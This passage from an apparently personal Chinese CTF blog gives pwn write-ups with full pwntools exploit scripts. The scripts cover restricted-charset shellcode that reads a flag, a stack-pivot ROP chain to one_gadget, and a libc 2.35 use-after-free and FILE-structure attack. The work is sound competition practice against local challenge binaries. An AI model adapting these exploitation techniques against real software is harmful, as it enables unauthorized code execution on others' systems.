<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./shellcode&quot;</span>)</span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line"></span><br><span class="line">allowed = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">79</span>, <span class="number">96</span>):</span><br><span class="line">    allowed += <span class="built_in">chr</span>(i)</span><br><span class="line">log.success(<span class="string">&quot;allowed===&gt;&quot;</span>+allowed)</span><br><span class="line"></span><br><span class="line">syscall = asm(<span class="string">&#x27;syscall&#x27;</span>)</span><br><span class="line"><span class="comment"># print(len(syscall))   #2</span></span><br><span class="line">io.sendafter(<span class="string">b&quot;Input: (ye / no)&quot;</span>, syscall)</span><br><span class="line"></span><br><span class="line">shellcode1 = asm(</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string">pop rsi</span></span><br><span class="line"><span class="string">push rbx</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">push rbx</span></span><br><span class="line"><span class="string">pop rdi</span></span><br><span class="line"><span class="string">pop rcx</span></span><br><span class="line"><span class="string">pop rcx</span></span><br><span class="line"><span class="string">pop rsp</span></span><br><span class="line"><span class="string">pop rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">push rbp</span></span><br><span class="line"><span class="string">pop rdx</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>).ljust(<span class="number">17</span>, <span class="string">b&#x27;Y&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># print(len(shellcode1))    #17</span></span><br><span class="line">gdb.attach(io, <span class="string">&quot;b *$rebase(0x14F2)&quot;</span>)</span><br><span class="line">pause()</span><br><span class="line">io.sendafter(<span class="string">b&quot;[5] ======== Input Your P0P Code ========\n&quot;</span>, shellcode1)</span><br><span class="line"></span><br><span class="line">shellcode2 = asm(</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">sub rsp, 0x2000</span></span><br><span class="line"><span class="string">mov eax, 0x67616c66 ;// flag</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov rdi, rsp</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">mov esi, eax</span></span><br><span class="line"><span class="string">mov al, 2</span></span><br><span class="line"><span class="string">syscall ;// open</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, eax</span></span><br><span class="line"><span class="string">mov esi, 0</span></span><br><span class="line"><span class="string">mov eax, 33</span></span><br><span class="line"><span class="string">syscall ;// dup2</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edi, 0</span></span><br><span class="line"><span class="string">mov rsi, rsp</span></span><br><span class="line"><span class="string">mov rdx, 0x0000000000000100</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">syscall ;// read</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov edx, eax</span></span><br><span class="line"><span class="string">mov rsi, rsp</span></span><br><span class="line"><span class="string">xor eax, eax</span></span><br><span class="line"><span class="string">inc eax</span></span><br><span class="line"><span class="string">mov edi, eax</span></span><br><span class="line"><span class="string">mov rcx, 0x8000000000000000</span></span><br><span class="line"><span class="string">add rdi, rcx</span></span><br><span class="line"><span class="string">syscall ;// write</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line">io.send(<span class="string">b&#x27;\x90&#x27;</span>*<span class="number">0x12</span>+shellcode2)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="4-heap"><a href="#4-heap" class="headerlink" title="4. heap"></a>4. heap</h2><p>菜单题，但是利用<strong>线程</strong>执行堆操作。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309051943811.png" alt="image-20230905194322529" style="zoom:50%;" />

<p>edit 存在<strong>条件竞争</strong>，导致了 Heap Overflow。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309051949413.png" alt="image-20230905194910264" style="zoom:50%;" />

<p>Wiki 上找来的条件竞争介绍，由多进程（线程）共享同一数据区域导致的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时，就可能会出现 bug。这个术语最初来自于两个电信号互相竞争来影响输出结果。</span><br></pre></td></tr></table></figure>

<p>wp 有些看不懂，暂时先不复盘。</p>
<h1 id="2023国赛华东南赛区"><a href="#2023国赛华东南赛区" class="headerlink" title="2023国赛华东南赛区"></a>2023国赛华东南赛区</h1><h2 id="1-login"><a href="#1-login" class="headerlink" title="1. login"></a>1. login</h2><p>被出题人气晕。一道看似普通的栈迁移题目。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309060005178.png" alt="image-20230906000536967" style="zoom:50%;" />

<p>坑1：泄露 libc 的时候要抬栈。</p>
<p>坑2：要返回到程序的 call puts 上，返回其他地址不知为何会报错。</p>
<p>坑3；栈溢出后第二次溢出了 18 个字节，但由于栈不够高，直接打 system(“/bin/sh\x00”)行不通。</p>
<p>于是乎，找了个贼奇怪的 gadget : mov edx, 0x148fff0，增加溢出长度，然后再构造条件打 one_gadget，调试调得心肌梗要出来了😵。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309060009110.png" alt="image-20230906000934067" style="zoom: 50%;" />

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./login&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./login&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0x00000000004013d3</span></span><br><span class="line">pop_rsi_r15_ret = <span class="number">0x00000000004013d1</span></span><br><span class="line">leave_ret = <span class="number">0x40136E</span></span><br><span class="line">ret = <span class="number">0x000000000040101a</span></span><br><span class="line"></span><br><span class="line">start = <span class="number">0x4010F0</span></span><br><span class="line">main = <span class="number">0x4012CE</span></span><br><span class="line">magic = <span class="number">0x40134E</span></span><br><span class="line">bss = <span class="number">0x404060</span></span><br><span class="line"></span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">240</span> + p64(bss) + p64(leave_ret)</span><br><span class="line">io.sendafter(<span class="string">b&quot;Enter your password:\n&quot;</span>, payload1)</span><br><span class="line"></span><br><span class="line">payload2 = p64(<span class="number">0x404800</span>)</span><br><span class="line">payload2 += p64(ret)*<span class="number">12</span> + p64(pop_rdi_ret) + p64(elf.got[<span class="string">&quot;alarm&quot;</span>]) + p64(magic)</span><br><span class="line">gdb.attach(io, <span class="string">&quot;b *0x40136E&quot;</span>)</span><br><span class="line">pause()</span><br><span class="line">io.sendafter(<span class="string">b&quot;Enter your password:\n&quot;</span>, payload2)</span><br><span class="line"></span><br><span class="line">libc_base = u64(io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - libc.sym[<span class="string">&quot;alarm&quot;</span>]</span><br><span class="line">log.success(<span class="string">&quot;libc_base===&gt;&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">system = libc_base + libc.sym[<span class="string">&quot;system&quot;</span>]</span><br><span class="line">binsh = <span class="number">0x404060</span></span><br><span class="line">one_gadget = libc_base + <span class="number">0xebcf8</span></span><br><span class="line"></span><br><span class="line">pop_rdx_r12_ret = libc_base + <span class="number">0x000000000011f497</span></span><br><span class="line"></span><br><span class="line">io.send(<span class="string">b&#x27;/bin/sh\x00&#x27;</span> + p64(<span class="number">0x404080</span>)*<span class="number">13</span> + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span> + p64(libc_base+<span class="number">0x011c929</span>)+ p64(elf.sym[<span class="string">&quot;read&quot;</span>]))</span><br><span class="line"></span><br><span class="line">io.send(<span class="string">b&#x27;/bin/sh\x00&#x27;</span> + p64(<span class="number">0x404080</span>)*<span class="number">13</span> + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x8</span> + p64(ret)*<span class="number">10</span> + p64(pop_rdx_r12_ret) + p64(<span class="number">0</span>)*<span class="number">2</span> + p64(pop_rsi_r15_ret) + p64(<span class="number">0</span>)*<span class="number">2</span> + p64(one_gadget))</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="2-notepad"><a href="#2-notepad" class="headerlink" title="2. notepad"></a>2. notepad</h2><p>这种板子题终于能独自做出来了😭，一道 libc 2.35 的 UAF 漏洞题，bss 上维护了堆指针和堆 size，释放的时候只置零了堆 size，导致了 UAF 漏洞。</p>
<img src="https://anza.oss-cn-hangzhou.aliyuncs.com/img/202309061637538.png" alt="image-20230906163750321" style="zoom:50%;" />

<p>申请堆的次数有 15 次，先通过 unsorted bin 泄露 libc，再通过 UAF 造成双指针指向同一个堆，一个用来 free 一个用来 edit。申请到 _IO_list_all，打 FILE 板子就好了，最后通过 exit(0) 触发链子。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./notepad&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, date, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="built_in">str</span>(<span class="number">1</span>).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;size: &quot;</span>, <span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;date: &quot;</span>, date)</span><br><span class="line">    io.sendlineafter(<span class="string">b&#x27;content: &#x27;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="built_in">str</span>(<span class="number">2</span>).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;page: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="built_in">str</span>(<span class="number">3</span>).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;page: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, date, content</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="built_in">str</span>(<span class="number">4</span>).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;page: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;date: &quot;</span>, date)</span><br><span class="line">    io.sendlineafter(<span class="string">b&#x27;content: &#x27;</span>, content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    add(<span class="number">0x80</span>, <span class="string">b&#x27;anza&#x27;</span>, <span class="string">b&#x27;bbbb&#x27;</span>) <span class="comment">#0-7</span></span><br><span class="line">add(<span class="number">0x80</span>, <span class="string">b&#x27;protect&#x27;</span>, <span class="string">b&#x27;aaaaa&#x27;</span>) <span class="comment">#8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    free(i)</span><br><span class="line"></span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">libc_base = u64(io.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - (<span class="number">0x7fd810019ce0</span> - <span class="number">0x7fd80fe00000</span>)</span><br><span class="line">log.success(<span class="string">&quot;libc_base===&gt;&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;date: &quot;</span>)</span><br><span class="line">key = u64(io.recv(<span class="number">5</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">heap_base = key &lt;&lt; <span class="number">12</span></span><br><span class="line">log.success(<span class="string">&quot;heap_base===&gt;&quot;</span>+<span class="built_in">hex</span>(heap_base))</span><br><span class="line"></span><br><span class="line">_IO_list_all = libc_base + libc.sym[<span class="string">&quot;_IO_list_all&quot;</span>]</span><br><span class="line">add(<span class="number">0x80</span>, <span class="string">b&#x27;anza&#x27;</span>, <span class="string">b&#x27;cccc&#x27;</span>) <span class="comment">#9(6)</span></span><br><span class="line">free(<span class="number">6</span>)</span><br><span class="line">edit(<span class="number">9</span>, p64(_IO_list_all^key), p64(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>, <span class="string">b&#x27;anza&#x27;</span>, <span class="string">b&#x27;dddd&#x27;</span>)  <span class="comment">#10</span></span><br><span class="line">add(<span class="number">0x80</span>, p64(heap_base+<span class="number">0x850</span>), <span class="string">b&#x27;&#x27;</span>)  <span class="comment">#11</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">_IO_wfile_jumps = libc_base + libc.sym[<span class="string">&quot;_IO_wfile_jumps&quot;</span>]</span><br><span class="line"></span><br><span class="line">fake_IO_list_all_addr = heap_base + <span class="number">0x850</span></span><br><span class="line">fake_IO_list_all = <span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line">fake_IO_list_all = fake_IO_list_all.ljust(<span class="number">0x28</span>, <span class="string">b&#x27;\x00&#x27;</span>) + p64(<span class="number">1</span>)</span><br><span class="line">fake_IO_list_all = fake_IO_list_all.ljust(<span class="number">0xa0</span>, <span class="string">b&#x27;\x00&#x27;</span>) + p64(heap_base+<span class="number">0x970</span>)</span><br><span class="line">fake_IO_list_all = fake_IO_list_all.ljust(<span class="number">0xd8</span>, <span class="string">b&#x27;\x00&#x27;</span>) + p64(_IO_wfile_jumps)</span><br><span class="line"><span class="comment"># fake_IO_list_all = fake_IO_list_all.ljust(0xe0+0xe0, b&#x27;\x00&#x27;) + p64(heap_base)</span></span><br><span class="line"></span><br><span class="line">fake_wide_data = <span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line">fake_wide_data = fake_wide_data.ljust(<span class="number">0xe0</span>, <span class="string">b&#x27;\x00&#x27;</span>) + p64(heap_base+<span class="number">0xa90</span>)</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + <span class="number">0xebcf1</span></span><br><span class="line">fake_wide_vtable = <span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line">fake_wide_vtable = fake_wide_vtable.ljust(<span class="number">0x68</span>, <span class="string">b&#x27;\x00&#x27;</span>) + p64(one_gadget)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x100</span>, <span class="string">b&#x27;anza&#x27;</span>, fake_IO_list_all)   <span class="comment">#12</span></span><br><span class="line">add(<span class="number">0x100</span>, <span class="string">b&#x27;anza&#x27;</span>, fake_wide_data)     <span class="comment">#13</span></span><br><span class="line">add(<span class="number">0x100</span>, <span class="string">b&#x27;anza&#x27;</span>, fake_wide_vtable)   <span class="comment">#14</span></span><br><span class="line"></span><br><span class="line">gdb.attach(io)</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;&gt;&gt; &quot;</span>, <span class="built_in">str</span>(<span class="number">5</span>).encode())</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>




    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/09/03/musl-pwn/" rel="prev" title="musl_pwn">
      <i class="fa fa-chevron-left"></i> musl_pwn
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2023%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%88%9D%E8%B5%9B"><span class="nav-number">1.</span> <span class="nav-text">2023羊城杯初赛</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-risky-login"><span class="nav-number">1.1.</span> <span class="nav-text">1. risky_login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-cookieBox"><span class="nav-number">1.2.</span> <span class="nav-text">2. cookieBox</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-shellcode"><span class="nav-number">1.3.</span> <span class="nav-text">3. shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-heap"><span class="nav-number">1.4.</span> <span class="nav-text">4. heap</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2023%E5%9B%BD%E8%B5%9B%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA"><span class="nav-number">2.</span> <span class="nav-text">2023国赛华东南赛区</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-login"><span class="nav-number">2.1.</span> <span class="nav-text">1. login</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-notepad"><span class="nav-number">2.2.</span> <span class="nav-text">2. notepad</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Anza"
      src="/images/Haida.png">
  <p class="site-author-name" itemprop="name">Anza</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://verf1sh.github.io/" title="https:&#x2F;&#x2F;verf1sh.github.io&#x2F;" rel="noopener" target="_blank">VerF1sh</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://4xwi11.github.io/" title="https:&#x2F;&#x2F;4xwi11.github.io&#x2F;" rel="noopener" target="_blank">4XWi11</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="author" itemprop="copyrightHolder">Anza</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
